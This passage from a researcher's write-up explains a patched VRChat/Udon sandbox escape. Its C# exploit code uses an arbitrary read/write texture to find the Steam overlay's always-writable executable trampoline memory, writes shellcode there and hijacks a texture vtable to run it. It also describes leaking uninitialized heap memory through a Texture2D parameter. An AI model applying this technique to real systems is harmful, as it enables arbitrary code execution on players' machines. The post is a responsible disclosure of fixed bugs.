<span class="giallo-l"><span style="color: #569CD6;"> var</span><span style="color: #9CDCFE;"> data</span><span style="color: #D4D4D4;"> =</span><span style="color: #569CD6;"> new</span><span style="color: #4EC9B0;"> Color32</span><span>[</span><span style="color: #B5CEA8;">2</span><span>]</span></span>
<span class="giallo-l"><span> {</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> new</span><span style="color: #4EC9B0;"> Color32</span><span>((</span><span style="color: #569CD6;">byte</span><span>)(</span><span style="color: #9CDCFE;">val</span><span style="color: #D4D4D4;"> &</span><span style="color: #B5CEA8;"> 0xFF</span><span>), (</span><span style="color: #569CD6;">byte</span><span>)((</span><span style="color: #9CDCFE;">val</span><span style="color: #D4D4D4;"> >></span><span style="color: #B5CEA8;"> 8</span><span>)</span><span style="color: #D4D4D4;"> &</span><span style="color: #B5CEA8;"> 0xFF</span><span>), (</span><span style="color: #569CD6;">byte</span><span>)((</span><span style="color: #9CDCFE;">val</span><span style="color: #D4D4D4;"> >></span><span style="color: #B5CEA8;"> 16</span><span>)</span><span style="color: #D4D4D4;"> &</span><span style="color: #B5CEA8;"> 0xFF</span><span>), (</span><span style="color: #569CD6;">byte</span><span>)((</span><span style="color: #9CDCFE;">val</span><span style="color: #D4D4D4;"> >></span><span style="color: #B5CEA8;"> 24</span><span>)</span><span style="color: #D4D4D4;"> &</span><span style="color: #B5CEA8;"> 0xFF</span><span>)),</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> new</span><span style="color: #4EC9B0;"> Color32</span><span>((</span><span style="color: #569CD6;">byte</span><span>)((</span><span style="color: #9CDCFE;">val</span><span style="color: #D4D4D4;"> >></span><span style="color: #B5CEA8;"> 32</span><span>)</span><span style="color: #D4D4D4;"> &</span><span style="color: #B5CEA8;"> 0xFF</span><span>), (</span><span style="color: #569CD6;">byte</span><span>)((</span><span style="color: #9CDCFE;">val</span><span style="color: #D4D4D4;"> >></span><span style="color: #B5CEA8;"> 40</span><span>)</span><span style="color: #D4D4D4;"> &</span><span style="color: #B5CEA8;"> 0xFF</span><span>), (</span><span style="color: #569CD6;">byte</span><span>)((</span><span style="color: #9CDCFE;">val</span><span style="color: #D4D4D4;"> >></span><span style="color: #B5CEA8;"> 48</span><span>)</span><span style="color: #D4D4D4;"> &</span><span style="color: #B5CEA8;"> 0xFF</span><span>), (</span><span style="color: #569CD6;">byte</span><span>)((</span><span style="color: #9CDCFE;">val</span><span style="color: #D4D4D4;"> >></span><span style="color: #B5CEA8;"> 56</span><span>)</span><span style="color: #D4D4D4;"> &</span><span style="color: #B5CEA8;"> 0xFF</span><span>)),</span></span>
<span class="giallo-l"><span> };</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> arbTex</span><span>.</span><span style="color: #DCDCAA;">SetPixels32</span><span>(</span><span style="color: #9CDCFE;">data</span><span>);</span></span>
<span class="giallo-l"><span>}</span></span></code></pre>
<p>Finally, I can use these primitives to set up a ROP chain and overwrite the target texture's vtable to pivot the stack and run shellcode.</p>
<p>...</p>
<p>...</p>
<p>Despite <code>UnityPlayer.dll</code> being a relatively large binary and having plenty of ROP gadgets, I still don't really want to write a ROP chain if I don't have to. It would be nice if I had some convenient writable executable memory to write my shellcode to instead of having to write yet another <code>VirtualAlloc</code>/<code>VirtualProtect</code> ROP chain. (Un)fortunately, VRChat uses <a rel="external" href="https://docs.unity3d.com/Manual/IL2CPP.html">IL2CPP</a>, which means all of the game's C# code is precompiled and there won't be anything from a JIT.</p>
<p>Still, it can't hurt to check, right?</p>
<p><img src="/img/vrcescape/rwx.png" alt="" /></p>
<h1 id="why-rop-when-you-have-steam">Why ROP When You Have Steam<a class="zola-anchor" href="#why-rop-when-you-have-steam" aria-label="Anchor link for: why-rop-when-you-have-steam"><i class="fas fa-link"></i></a>
</h1>
<p>Like most modern PC games, VRChat is on Steam, which has an in-game overlay accessible by pressing Shift+Tab. In order to be able to do this on almost every game without explicit integration from the original developers, the overlay DLL <em>(<code>GameOverlayRenderer64.dll</code>)</em> has to hook a few functions to intercept various things such as input. For some reason, it seems like Valve decided to write their own hooking library. The anatomy of a hooked function looks something like this:</p>
<p><img src="/img/vrcescape/hook.svg" alt="" /></p>
<p>The trampoline region is allocated within 2GB of the hooked function and exists because of an x86_64 limitation. Hooks usually want to overwrite as few instructions as possible in order to avoid issues, so a 5-byte jump is used for the initial hook jump.</p>
<p>However, there's only 4 bytes for a signed relative offset and the destination is usually over 2GB away, which is why the hook has to "bounce" off of the trampoline region in order to reach it via a larger jump (6-byte instruction + 8-byte pointer). It also stores the instructions that the initial jump overwrote in order to make sure the hook can still call the original function.</p>
<p>For some reason, Valve made the "interesting" design decision of making that trampoline region readable, writable, and executable at all times. This effectively turns these regions into free "Get Out of ROP Free" cards that exist on every 64-bit Steam game <del>as long as the overlay is enabled</del>.</p>
<p><strong>UPDATE (2024/11/23): <code>GameOverlayRenderer64.dll</code> still installs its hooks regardless of whether the overlay or Steam Input are enabled, as long as the game was launched through Steam or it initializes the Steam API. Thanks <a rel="external" href="https://invoxiplaygames.uk/">Emma</a>!</strong></p>
<p>The screenshot also shows one of these trampoline regions being allocated for <code>xinput1_3.dll</code>, a DLL notoriously known for not having ASLR enabled for some reason. For this exploit, I didn't want to rely on that region always being at the same address because it's entirely possible that something else could take up that region of memory before XInput gets loaded or the hook gets installed. Besides, I didn't want this exploit chain to be <em>that</em> easy.</p>
<p>Instead, I opted to get one of the hooked functions from <code>UnityPlayer.dll</code>'s import address table and read the jump instruction for the hook <em>(<code>jmp hook_entry</code>)</em> in order to find one of these magic RWX regions. This has the benefit of being able to check if the overlay is actually loaded before trying to write any shellcode instead of taking a leap of faith and blindly writing to a RWX region that may or may not be there. From here, code execution is trivial and the exploit is complete.</p>
<pre class="giallo" style="color: #E6E6E6; background-color: #222222;"><code data-lang="csharp"><span class="giallo-l"><span style="color: #569CD6;">private const uint</span><span style="color: #9CDCFE;"> LOADLIBRARYEXW_RVA</span><span style="color: #D4D4D4;"> =</span><span style="color: #B5CEA8;"> 0x185F658</span><span>;</span></span>
<span class="giallo-l"><span style="color: #569CD6;">private const uint</span><span style="color: #9CDCFE;"> GETMODULEHANDLEA_RVA</span><span style="color: #D4D4D4;"> =</span><span style="color: #B5CEA8;"> 0x185F6E8</span><span>;</span></span>
<span class="giallo-l"><span style="color: #569CD6;">private const uint</span><span style="color: #9CDCFE;"> GETPROCADDRESS_RVA</span><span style="color: #D4D4D4;"> =</span><span style="color: #B5CEA8;"> 0x185F7D0</span><span>;</span></span>
<span class="giallo-l"><span style="color: #569CD6;">private const uint</span><span style="color: #9CDCFE;"> SCRATCH_RVA</span><span style="color: #D4D4D4;"> =</span><span style="color: #B5CEA8;"> 0x1BF00B0</span><span>;</span><span style="color: #6A9955;"> // Can be any random part of .data</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;">// Get LoadLibraryExW's address from UnityPlayer.dll's IAT</span></span>
<span class="giallo-l"><span style="color: #569CD6;">ulong</span><span style="color: #9CDCFE;"> hook_addr</span><span style="color: #D4D4D4;"> =</span><span style="color: #DCDCAA;"> read64</span><span>(</span><span style="color: #9CDCFE;">unityPlayerBase</span><span style="color: #D4D4D4;"> +</span><span style="color: #9CDCFE;"> LOADLIBRARYEXW_RVA</span><span>);</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;">// Find one of GameOverlayRenderer64's RWX trampoline regions using the hook jump</span></span>
<span class="giallo-l"><span style="color: #569CD6;">ulong</span><span style="color: #9CDCFE;"> hook</span><span style="color: #D4D4D4;"> =</span><span style="color: #DCDCAA;"> read64</span><span>(</span><span style="color: #9CDCFE;">hook_addr</span><span>);</span></span>
<span class="giallo-l"><span style="color: #C586C0;">if</span><span> ((</span><span style="color: #9CDCFE;">hook</span><span style="color: #D4D4D4;"> &</span><span style="color: #B5CEA8;"> 0xFF</span><span>)</span><span style="color: #D4D4D4;"> !=</span><span style="color: #B5CEA8;"> 0xE9</span><span>)</span></span>
<span class="giallo-l"><span>{</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> Debug</span><span>.</span><span style="color: #DCDCAA;">LogError</span><span>(</span><span style="color: #CE9178;">"LoadLibraryExW isn't hooked by GameOverlayRenderer64"</span><span>);</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> return</span><span>;</span></span>
<span class="giallo-l"><span>}</span></span>
<span class="giallo-l"><span style="color: #569CD6;">ulong</span><span style="color: #9CDCFE;"> offset</span><span style="color: #D4D4D4;"> =</span><span> (</span><span style="color: #9CDCFE;">hook</span><span style="color: #D4D4D4;"> >></span><span style="color: #B5CEA8;"> 8</span><span>)</span><span style="color: #D4D4D4;"> &</span><span style="color: #B5CEA8;"> 0xFFFFFFFF</span><span>;</span></span>
<span class="giallo-l"><span style="color: #569CD6;">ulong</span><span style="color: #9CDCFE;"> target</span><span style="color: #D4D4D4;"> =</span><span style="color: #9CDCFE;"> hook_addr</span><span style="color: #D4D4D4;"> +</span><span style="color: #9CDCFE;"> offset</span><span style="color: #D4D4D4;"> +</span><span style="color: #B5CEA8;"> 5</span><span>;</span></span>
<span class="giallo-l"><span style="color: #C586C0;">if</span><span> ((</span><span style="color: #9CDCFE;">offset</span><span style="color: #D4D4D4;"> &</span><span style="color: #B5CEA8;"> 0x80000000</span><span>)</span><span style="color: #D4D4D4;"> !=</span><span style="color: #B5CEA8;"> 0</span><span>)</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> target</span><span style="color: #D4D4D4;"> -=</span><span style="color: #B5CEA8;"> 0x100000000</span><span>;</span><span style="color: #6A9955;"> // UdonSharp doesn't support unchecked signed <-> unsigned conversion and it's REALLY ANNOYING</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;">// Write shellcode to the RWX region</span></span>
<span class="giallo-l"><span style="color: #C586C0;">for</span><span> (</span><span style="color: #569CD6;">int</span><span style="color: #9CDCFE;"> i</span><span style="color: #D4D4D4;"> =</span><span style="color: #B5CEA8;"> 0</span><span>;</span><span style="color: #9CDCFE;"> i</span><span style="color: #D4D4D4;"> <</span><span style="color: #9CDCFE;"> shellcode</span><span>.</span><span style="color: #9CDCFE;">Length</span><span>;</span><span style="color: #9CDCFE;"> i</span><span style="color: #D4D4D4;">++</span><span>)</span></span>
<span class="giallo-l"><span>{</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // Replace placeholder values with addresses known at runtime</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> ulong</span><span style="color: #9CDCFE;"> val</span><span style="color: #D4D4D4;"> =</span><span style="color: #9CDCFE;"> shellcode</span><span>[</span><span style="color: #9CDCFE;">i</span><span>];</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> if</span><span> (</span><span style="color: #9CDCFE;">val</span><span style="color: #D4D4D4;"> ==</span><span style="color: #B5CEA8;"> 0x4141414141414141</span><span>)</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> val</span><span style="color: #D4D4D4;"> =</span><span style="color: #DCDCAA;"> read64</span><span>(</span><span style="color: #9CDCFE;">unityPlayerBase</span><span style="color: #D4D4D4;"> +</span><span style="color: #9CDCFE;"> GETMODULEHANDLEA_RVA</span><span>);</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> else if</span><span> (</span><span style="color: #9CDCFE;">val</span><span style="color: #D4D4D4;"> ==</span><span style="color: #B5CEA8;"> 0x4242424242424242</span><span>)</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> val</span><span style="color: #D4D4D4;"> =</span><span style="color: #DCDCAA;"> read64</span><span>(</span><span style="color: #9CDCFE;">unityPlayerBase</span><span style="color: #D4D4D4;"> +</span><span style="color: #9CDCFE;"> GETPROCADDRESS_RVA</span><span>);</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> write64</span><span>(</span><span style="color: #9CDCFE;">target</span><span style="color: #D4D4D4;"> +</span><span> (</span><span style="color: #569CD6;">ulong</span><span>)</span><span style="color: #9CDCFE;">i</span><span style="color: #D4D4D4;"> *</span><span style="color: #B5CEA8;"> 8</span><span>,</span><span style="color: #9CDCFE;"> val</span><span>);</span></span>
<span class="giallo-l"><span>}</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;">// Put a fake vtable somewhere</span></span>
<span class="giallo-l"><span style="color: #6A9955;">// This points Texture3D::MainThreadCleanup to the shellcode</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;">write64</span><span>(</span><span style="color: #9CDCFE;">unityPlayerBase</span><span style="color: #D4D4D4;"> +</span><span style="color: #9CDCFE;"> SCRATCH_RVA</span><span style="color: #D4D4D4;"> +</span><span style="color: #B5CEA8;"> 8</span><span>,</span><span style="color: #9CDCFE;"> target</span><span>);</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;">// Overwrite the arbitrary r/w texture's vtable pointer</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;">write32Rel</span><span>(</span><span style="color: #9CDCFE;">arbTexOffset</span><span>, (</span><span style="color: #569CD6;">uint</span><span>)((</span><span style="color: #9CDCFE;">unityPlayerBase</span><span style="color: #D4D4D4;"> +</span><span style="color: #9CDCFE;"> SCRATCH_RVA</span><span>)</span><span style="color: #D4D4D4;"> &</span><span style="color: #B5CEA8;"> 0xFFFFFFFF</span><span>));</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;">write32Rel</span><span>(</span><span style="color: #9CDCFE;">arbTexOffset</span><span style="color: #D4D4D4;"> +</span><span style="color: #B5CEA8;"> 4</span><span>, (</span><span style="color: #569CD6;">uint</span><span>)((</span><span style="color: #9CDCFE;">unityPlayerBase</span><span style="color: #D4D4D4;"> +</span><span style="color: #9CDCFE;"> SCRATCH_RVA</span><span>)</span><span style="color: #D4D4D4;"> >></span><span style="color: #B5CEA8;"> 32</span><span>));</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;">// Call MainThreadCleanup by destroying the texture and run the shellcode!</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;">Destroy</span><span>(</span><span style="color: #9CDCFE;">arbTex</span><span>);</span></span></code></pre><iframe width="100%" src="https://www.youtube-nocookie.com/embed/zQepvGpZFJc" frameborder="0" allowfullscreen style="aspect-ratio: 16/10;" referrerpolicy="strict-origin-when-cross-origin"></iframe>
<p><em>(as for the title of the video, this really <a rel="external" href="https://www.youtube.com/watch?v=3L89In9bzEA">wasn't the first time I did this</a>, but that writeup is lost to time...)</em></p>
<p><em><strong>To Udon devs:</strong> This exploit was why <a rel="external" href="https://feedback.vrchat.com/udon/p/the-texture2d-constructor-suddenly-does-not-support-most-textureformats">this regression</a> happened. A check was added for the texture constructors to make sure the size wouldn't overflow, but not every format was handled in the check. Sorry about that :(</em></p>
<h1 id="honorable-mention">Honorable Mention<a class="zola-anchor" href="#honorable-mention" aria-label="Anchor link for: honorable-mention"><i class="fas fa-link"></i></a>
</h1>
<p>This wasn't something I used in the final exploit, but I thought it was interesting enough to mention. While experimenting with large texture sizes, I noticed an interesting parameter in <code>Texture2D</code>'s constructor:</p>
<p><img src="/img/vrcescape/susparam1.png" alt="" /></p>
<p>Then I checked what was exposed in Udon:</p>
<p><img src="/img/vrcescape/susparam2.png" alt="" /></p>
<p>And I gave it a shot:</p>
<p><img src="/img/vrcescape/uninit.png" alt="" /></p>
<p>Yes, this really did allow reading uninitialized heap memory via intended Unity behavior. Thankfully, I didn't see any other obvious API whitelist oversights like this. <strong>Although these constructors are still exposed in the latest version, they now throw an exception if <code>createUninitialized</code> is enabled.</strong></p>
<p>Thanks to Tupper, the rest of the VRChat team, and Unity for their cooperation in getting these vulnerabilities fixed.</p>